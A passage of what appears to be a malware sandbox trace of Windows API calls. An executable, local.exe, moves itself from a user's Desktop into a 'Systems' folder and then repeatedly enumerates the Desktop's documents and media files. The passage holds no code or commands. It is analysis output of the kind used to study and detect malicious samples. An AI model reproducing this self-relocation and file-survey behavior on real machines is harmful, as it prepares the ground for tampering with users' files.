lpFileInformation=0x3ae6fc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1410cb80, ftCreationTime.dwHighDateTime=0x1d53803, ftLastAccessTime.dwLowDateTime=0x1410cb80, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x12470800, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x1d600)) returned 1 [0034.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae67c) returned 1 [0034.495] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\local.exe"), lpNewFileName="C:\\5p5NrGJn0jS HALPmcxz\\Systems\\local.exe" (normalized: "c:\\5p5nrgjn0js halpmcxz\\systems\\local.exe")) returned 1 [0035.054] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0035.055] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0035.055] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x0) returned 0x26 [0035.056] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1f4e1d40, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x27d63240, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405d48 [0035.057] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1f4e1d40, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x27d63240, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.057] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f58a80, ftCreationTime.dwHighDateTime=0x1d4d216, ftLastAccessTime.dwLowDateTime=0x9eba96d0, ftLastAccessTime.dwHighDateTime=0x1d4d552, ftLastWriteTime.dwLowDateTime=0x9eba96d0, ftLastWriteTime.dwHighDateTime=0x1d4d552, nFileSizeHigh=0x0, nFileSizeLow=0x11b9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FQ_9d0LXe6pMvO2.rtf", cAlternateFileName="1FQ_9D~1.RTF")) returned 1 [0035.058] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d296e30, ftCreationTime.dwHighDateTime=0x1d4d401, ftLastAccessTime.dwLowDateTime=0x3a416670, ftLastAccessTime.dwHighDateTime=0x1d4d115, ftLastWriteTime.dwLowDateTime=0x3a416670, ftLastWriteTime.dwHighDateTime=0x1d4d115, nFileSizeHigh=0x0, nFileSizeLow=0x14479, dwReserved0=0x0, dwReserved1=0x0, cFileName="2eA2OpRDysRpr2xv6.m4a", cAlternateFileName="2EA2OP~1.M4A")) returned 1 [0035.058] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9611880, ftCreationTime.dwHighDateTime=0x1d4c9e9, ftLastAccessTime.dwLowDateTime=0xe5b5d0d0, ftLastAccessTime.dwHighDateTime=0x1d4cae0, ftLastWriteTime.dwLowDateTime=0xe5b5d0d0, ftLastWriteTime.dwHighDateTime=0x1d4cae0, nFileSizeHigh=0x0, nFileSizeLow=0xf509, dwReserved0=0x0, dwReserved1=0x0, cFileName="2IEebvswkOP20ZmPaTRl.odp", cAlternateFileName="2IEEBV~1.ODP")) returned 1 [0035.058] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf5379f0, ftCreationTime.dwHighDateTime=0x1d4cfbd, ftLastAccessTime.dwLowDateTime=0x3003e2c0, ftLastAccessTime.dwHighDateTime=0x1d4ce7a, ftLastWriteTime.dwLowDateTime=0x3003e2c0, ftLastWriteTime.dwHighDateTime=0x1d4ce7a, nFileSizeHigh=0x0, nFileSizeLow=0xec72, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Xy0mJv5xwhx4K1K.mkv", cAlternateFileName="2XY0MJ~1.MKV")) returned 1 [0035.058] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x876b7c80, ftCreationTime.dwHighDateTime=0x1d4c687, ftLastAccessTime.dwLowDateTime=0xf7684e80, ftLastAccessTime.dwHighDateTime=0x1d4c864, ftLastWriteTime.dwLowDateTime=0xf7684e80, ftLastWriteTime.dwHighDateTime=0x1d4c864, nFileSizeHigh=0x0, nFileSizeLow=0x4660, dwReserved0=0x0, dwReserved1=0x0, cFileName="3csTOhoBZSK.swf", cAlternateFileName="3CSTOH~1.SWF")) returned 1 [0035.059] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a974ad0, ftCreationTime.dwHighDateTime=0x1d4cd47, ftLastAccessTime.dwLowDateTime=0xe955410, ftLastAccessTime.dwHighDateTime=0x1d4d30d, ftLastWriteTime.dwLowDateTime=0xe955410, ftLastWriteTime.dwHighDateTime=0x1d4d30d, nFileSizeHigh=0x0, nFileSizeLow=0x97a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="6oF3FL3YfrkND.bmp", cAlternateFileName="6OF3FL~1.BMP")) returned 1 [0035.059] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fcea30, ftCreationTime.dwHighDateTime=0x1d4cff5, ftLastAccessTime.dwLowDateTime=0xeb645dd0, ftLastAccessTime.dwHighDateTime=0x1d4ce3c, ftLastWriteTime.dwLowDateTime=0xeb645dd0, ftLastWriteTime.dwHighDateTime=0x1d4ce3c, nFileSizeHigh=0x0, nFileSizeLow=0xc5cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="7C9V.jpg", cAlternateFileName="")) returned 1 [0035.059] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c77a6e0, ftCreationTime.dwHighDateTime=0x1d4cde6, ftLastAccessTime.dwLowDateTime=0xf7e25640, ftLastAccessTime.dwHighDateTime=0x1d4d5a6, ftLastWriteTime.dwLowDateTime=0xf7e25640, ftLastWriteTime.dwHighDateTime=0x1d4d5a6, nFileSizeHigh=0x0, nFileSizeLow=0x690b, dwReserved0=0x0, dwReserved1=0x0, cFileName="9 Bj5iosU.wav", cAlternateFileName="9BJ5IO~1.WAV")) returned 1 [0035.059] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa96ea00, ftCreationTime.dwHighDateTime=0x1d4cd03, ftLastAccessTime.dwLowDateTime=0x3d2a3800, ftLastAccessTime.dwHighDateTime=0x1d4ca92, ftLastWriteTime.dwLowDateTime=0x3d2a3800, ftLastWriteTime.dwHighDateTime=0x1d4ca92, nFileSizeHigh=0x0, nFileSizeLow=0xced3, dwReserved0=0x0, dwReserved1=0x0, cFileName="CMEi.pps", cAlternateFileName="")) returned 1 [0035.059] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0035.059] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6a67250, ftCreationTime.dwHighDateTime=0x1d4cbcb, ftLastAccessTime.dwLowDateTime=0x3e8d5750, ftLastAccessTime.dwHighDateTime=0x1d4d54f, ftLastWriteTime.dwLowDateTime=0x3e8d5750, ftLastWriteTime.dwHighDateTime=0x1d4d54f, nFileSizeHigh=0x0, nFileSizeLow=0x3da7, dwReserved0=0x0, dwReserved1=0x0, cFileName="dRLDjJ.swf", cAlternateFileName="")) returned 1 [0035.059] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c999730, ftCreationTime.dwHighDateTime=0x1d4ceb8, ftLastAccessTime.dwLowDateTime=0xd07de150, ftLastAccessTime.dwHighDateTime=0x1d4ceda, ftLastWriteTime.dwLowDateTime=0xd07de150, ftLastWriteTime.dwHighDateTime=0x1d4ceda, nFileSizeHigh=0x0, nFileSizeLow=0x134a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="ENBmMMWK.bmp", cAlternateFileName="")) returned 1 [0035.059] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4ddbec0, ftCreationTime.dwHighDateTime=0x1d4cc51, ftLastAccessTime.dwLowDateTime=0xf54fa3d0, ftLastAccessTime.dwHighDateTime=0x1d4d33d, ftLastWriteTime.dwLowDateTime=0xf54fa3d0, ftLastWriteTime.dwHighDateTime=0x1d4d33d, nFileSizeHigh=0x0, nFileSizeLow=0x10751, dwReserved0=0x0, dwReserved1=0x0, cFileName="gH-zamZAJg.mp3", cAlternateFileName="GH-ZAM~1.MP3")) returned 1 [0035.060] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ee2d40, ftCreationTime.dwHighDateTime=0x1d4d1d7, ftLastAccessTime.dwLowDateTime=0xe528e990, ftLastAccessTime.dwHighDateTime=0x1d4d4e5, ftLastWriteTime.dwLowDateTime=0xe528e990, ftLastWriteTime.dwHighDateTime=0x1d4d4e5, nFileSizeHigh=0x0, nFileSizeLow=0x151ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="ICKBPik8.flv", cAlternateFileName="")) returned 1 [0035.060] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1ebac40, ftCreationTime.dwHighDateTime=0x1d4c9fe, ftLastAccessTime.dwLowDateTime=0x989a0550, ftLastAccessTime.dwHighDateTime=0x1d4cb2b, ftLastWriteTime.dwLowDateTime=0x989a0550, ftLastWriteTime.dwHighDateTime=0x1d4cb2b, nFileSizeHigh=0x0, nFileSizeLow=0x16850, dwReserved0=0x0, dwReserved1=0x0, cFileName="m4SvX-jeGXwW.mkv", cAlternateFileName="M4SVX-~1.MKV")) returned 1 [0035.060] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcddf5a90, ftCreationTime.dwHighDateTime=0x1d4ce8b, ftLastAccessTime.dwLowDateTime=0x5c6f7bf0, ftLastAccessTime.dwHighDateTime=0x1d4d3d2, ftLastWriteTime.dwLowDateTime=0x5c6f7bf0, ftLastWriteTime.dwHighDateTime=0x1d4d3d2, nFileSizeHigh=0x0, nFileSizeLow=0x6d32, dwReserved0=0x0, dwReserved1=0x0, cFileName="O0y0hsLAoKxoA.mp3", cAlternateFileName="O0Y0HS~1.MP3")) returned 1 [0035.060] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a8281a0, ftCreationTime.dwHighDateTime=0x1d4d373, ftLastAccessTime.dwLowDateTime=0x95a18ea0, ftLastAccessTime.dwHighDateTime=0x1d4cd14, ftLastWriteTime.dwLowDateTime=0x95a18ea0, ftLastWriteTime.dwHighDateTime=0x1d4cd14, nFileSizeHigh=0x0, nFileSizeLow=0x16fab, dwReserved0=0x0, dwReserved1=0x0, cFileName="RQ9 -66bCRPg.odp", cAlternateFileName="RQ9-66~1.ODP")) returned 1 [0035.060] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24e9870, ftCreationTime.dwHighDateTime=0x1d4d2a5, ftLastAccessTime.dwLowDateTime=0x1bf10c20, ftLastAccessTime.dwHighDateTime=0x1d4d502, ftLastWriteTime.dwLowDateTime=0x1bf10c20, ftLastWriteTime.dwHighDateTime=0x1d4d502, nFileSizeHigh=0x0, nFileSizeLow=0x5c9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="sN3K33tDMKQaoIqJe.mp4", cAlternateFileName="SN3K33~1.MP4")) returned 1 [0035.060] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x887d2840, ftCreationTime.dwHighDateTime=0x1d4d5a9, ftLastAccessTime.dwLowDateTime=0x24ca6ae0, ftLastAccessTime.dwHighDateTime=0x1d4c9c6, ftLastWriteTime.dwLowDateTime=0x24ca6ae0, ftLastWriteTime.dwHighDateTime=0x1d4c9c6, nFileSizeHigh=0x0, nFileSizeLow=0x87fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="sxImIod6M.m4a", cAlternateFileName="SXIMIO~1.M4A")) returned 1 [0035.061] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36868070, ftCreationTime.dwHighDateTime=0x1d4d47a, ftLastAccessTime.dwLowDateTime=0x82604d80, ftLastAccessTime.dwHighDateTime=0x1d4ca54, ftLastWriteTime.dwLowDateTime=0x82604d80, ftLastWriteTime.dwHighDateTime=0x1d4ca54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="T9ZgHii-", cAlternateFileName="")) returned 1 [0035.061] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55265fc0, ftCreationTime.dwHighDateTime=0x1d4c618, ftLastAccessTime.dwLowDateTime=0x613dbfe0, ftLastAccessTime.dwHighDateTime=0x1d4ca9d, ftLastWriteTime.dwLowDateTime=0x613dbfe0, ftLastWriteTime.dwHighDateTime=0x1d4ca9d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tQYzvy44", cAlternateFileName="")) returned 1 [0035.061] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaa03290, ftCreationTime.dwHighDateTime=0x1d4d118, ftLastAccessTime.dwLowDateTime=0x3abf6060, ftLastAccessTime.dwHighDateTime=0x1d4c69e, ftLastWriteTime.dwLowDateTime=0x3abf6060, ftLastWriteTime.dwHighDateTime=0x1d4c69e, nFileSizeHigh=0x0, nFileSizeLow=0x139da, dwReserved0=0x0, dwReserved1=0x0, cFileName="wcRE.jpg", cAlternateFileName="")) returned 1 [0035.061] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d01ce90, ftCreationTime.dwHighDateTime=0x1d4d54b, ftLastAccessTime.dwLowDateTime=0x7107d870, ftLastAccessTime.dwHighDateTime=0x1d4d23b, ftLastWriteTime.dwLowDateTime=0x7107d870, ftLastWriteTime.dwHighDateTime=0x1d4d23b, nFileSizeHigh=0x0, nFileSizeLow=0xb618, dwReserved0=0x0, dwReserved1=0x0, cFileName="XRPTN7Kw.png", cAlternateFileName="")) returned 1 [0035.061] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2d476b0, ftCreationTime.dwHighDateTime=0x1d4cc77, ftLastAccessTime.dwLowDateTime=0x17a50f70, ftLastAccessTime.dwHighDateTime=0x1d4c7ad, ftLastWriteTime.dwLowDateTime=0x17a50f70, ftLastWriteTime.dwHighDateTime=0x1d4c7ad, nFileSizeHigh=0x0, nFileSizeLow=0xaf75, dwReserved0=0x0, dwReserved1=0x0, cFileName="yjbKOP66PA6 t9xa78.bmp", cAlternateFileName="YJBKOP~1.BMP")) returned 1 [0035.062] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d050ed0, ftCreationTime.dwHighDateTime=0x1d4c956, ftLastAccessTime.dwLowDateTime=0x88d79d70, ftLastAccessTime.dwHighDateTime=0x1d4cd1b, ftLastWriteTime.dwLowDateTime=0x88d79d70, ftLastWriteTime.dwHighDateTime=0x1d4cd1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Zh5KHKzPc6AOkC3JGPhN", cAlternateFileName="ZH5KHK~1")) returned 1 [0035.062] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fa5d7a0, ftCreationTime.dwHighDateTime=0x1d4cabf, ftLastAccessTime.dwLowDateTime=0xe356290, ftLastAccessTime.dwHighDateTime=0x1d4c650, ftLastWriteTime.dwLowDateTime=0xe356290, ftLastWriteTime.dwHighDateTime=0x1d4c650, nFileSizeHigh=0x0, nFileSizeLow=0x44af, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZR4FkDMgSj24KiPo8.odt", cAlternateFileName="ZR4FKD~1.ODT")) returned 1 [0035.062] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e75a920, ftCreationTime.dwHighDateTime=0x1d4cf39, ftLastAccessTime.dwLowDateTime=0x99ddca50, ftLastAccessTime.dwHighDateTime=0x1d4ce28, ftLastWriteTime.dwLowDateTime=0x99ddca50, ftLastWriteTime.dwHighDateTime=0x1d4ce28, nFileSizeHigh=0x0, nFileSizeLow=0x134df, dwReserved0=0x0, dwReserved1=0x0, cFileName="Zu7U9XrkG49K.wav", cAlternateFileName="ZU7U9X~1.WAV")) returned 1 [0035.062] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0035.062] FindClose (in: hFindFile=0x405d48 | out: hFindFile=0x405d48) returned 1 [0035.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0035.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0035.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0035.063] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0035.063] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x0) returned 0x26 [0035.063] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27d63240, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x27d63240, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405d48 [0035.063] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27d63240, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x27d63240, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.063] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f58a80, ftCreationTime.dwHighDateTime=0x1d4d216, ftLastAccessTime.dwLowDateTime=0x9eba96d0, ftLastAccessTime.dwHighDateTime=0x1d4d552, ftLastWriteTime.dwLowDateTime=0x9eba96d0, ftLastWriteTime.dwHighDateTime=0x1d4d552, nFileSizeHigh=0x0, nFileSizeLow=0x11b9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FQ_9d0LXe6pMvO2.rtf", cAlternateFileName="1FQ_9D~1.RTF")) returned 1 [0035.064] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d296e30, ftCreationTime.dwHighDateTime=0x1d4d401, ftLastAccessTime.dwLowDateTime=0x3a416670, ftLastAccessTime.dwHighDateTime=0x1d4d115, ftLastWriteTime.dwLowDateTime=0x3a416670, ftLastWriteTime.dwHighDateTime=0x1d4d115, nFileSizeHigh=0x0, nFileSizeLow=0x14479, dwReserved0=0x0, dwReserved1=0x0, cFileName="2eA2OpRDysRpr2xv6.m4a", cAlternateFileName="2EA2OP~1.M4A")) returned 1 [0035.064] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9611880, ftCreationTime.dwHighDateTime=0x1d4c9e9, ftLastAccessTime.dwLowDateTime=0xe5b5d0d0, ftLastAccessTime.dwHighDateTime=0x1d4cae0, ftLastWriteTime.dwLowDateTime=0xe5b5d0d0, ftLastWriteTime.dwHighDateTime=0x1d4cae0, nFileSizeHigh=0x0, nFileSizeLow=0xf509, dwReserved0=0x0, dwReserved1=0x0, cFileName="2IEebvswkOP20ZmPaTRl.odp", cAlternateFileName="2IEEBV~1.ODP")) returned 1 [0035.064] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf5379f0, ftCreationTime.dwHighDateTime=0x1d4cfbd, ftLastAccessTime.dwLowDateTime=0x3003e2c0, ftLastAccessTime.dwHighDateTime=0x1d4ce7a, ftLastWriteTime.dwLowDateTime=0x3003e2c0, ftLastWriteTime.dwHighDateTime=0x1d4ce7a, nFileSizeHigh=0x0, nFileSizeLow=0xec72, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Xy0mJv5xwhx4K1K.mkv", cAlternateFileName="2XY0MJ~1.MKV")) returned 1 [0035.064] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x876b7c80, ftCreationTime.dwHighDateTime=0x1d4c687, ftLastAccessTime.dwLowDateTime=0xf7684e80, ftLastAccessTime.dwHighDateTime=0x1d4c864, ftLastWriteTime.dwLowDateTime=0xf7684e80, ftLastWriteTime.dwHighDateTime=0x1d4c864, nFileSizeHigh=0x0, nFileSizeLow=0x4660, dwReserved0=0x0, dwReserved1=0x0, cFileName="3csTOhoBZSK.swf", cAlternateFileName="3CSTOH~1.SWF")) returned 1 [0035.064] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a974ad0, ftCreationTime.dwHighDateTime=0x1d4cd47, ftLastAccessTime.dwLowDateTime=0xe955410, ftLastAccessTime.dwHighDateTime=0x1d4d30d, ftLastWriteTime.dwLowDateTime=0xe955410, ftLastWriteTime.dwHighDateTime=0x1d4d30d, nFileSizeHigh=0x0, nFileSizeLow=0x97a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="6oF3FL3YfrkND.bmp", cAlternateFileName="6OF3FL~1.BMP")) returned 1 [0035.065] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fcea30, ftCreationTime.dwHighDateTime=0x1d4cff5, ftLastAccessTime.dwLowDateTime=0xeb645dd0, ftLastAccessTime.dwHighDateTime=0x1d4ce3c, ftLastWriteTime.dwLowDateTime=0xeb645dd0, ftLastWriteTime.dwHighDateTime=0x1d4ce3c, nFileSizeHigh=0x0, nFileSizeLow=0xc5cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="7C9V.jpg", cAlternateFileName="")) returned 1 [0035.065] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c77a6e0, ftCreationTime.dwHighDateTime=0x1d4cde6, ftLastAccessTime.dwLowDateTime=0xf7e25640, ftLastAccessTime.dwHighDateTime=0x1d4d5a6, ftLastWriteTime.dwLowDateTime=0xf7e25640, ftLastWriteTime.dwHighDateTime=0x1d4d5a6, nFileSizeHigh=0x0, nFileSizeLow=0x690b, dwReserved0=0x0, dwReserved1=0x0, cFileName="9 Bj5iosU.wav", cAlternateFileName="9BJ5IO~1.WAV")) returned 1 [0035.065] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa96ea00, ftCreationTime.dwHighDateTime=0x1d4cd03, ftLastAccessTime.dwLowDateTime=0x3d2a3800, ftLastAccessTime.dwHighDateTime=0x1d4ca92, ftLastWriteTime.dwLowDateTime=0x3d2a3800, ftLastWriteTime.dwHighDateTime=0x1d4ca92, nFileSizeHigh=0x0, nFileSizeLow=0xced3, dwReserved0=0x0, dwReserved1=0x0, cFileName="CMEi.pps", cAlternateFileName="")) returned 1 [0035.065] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, 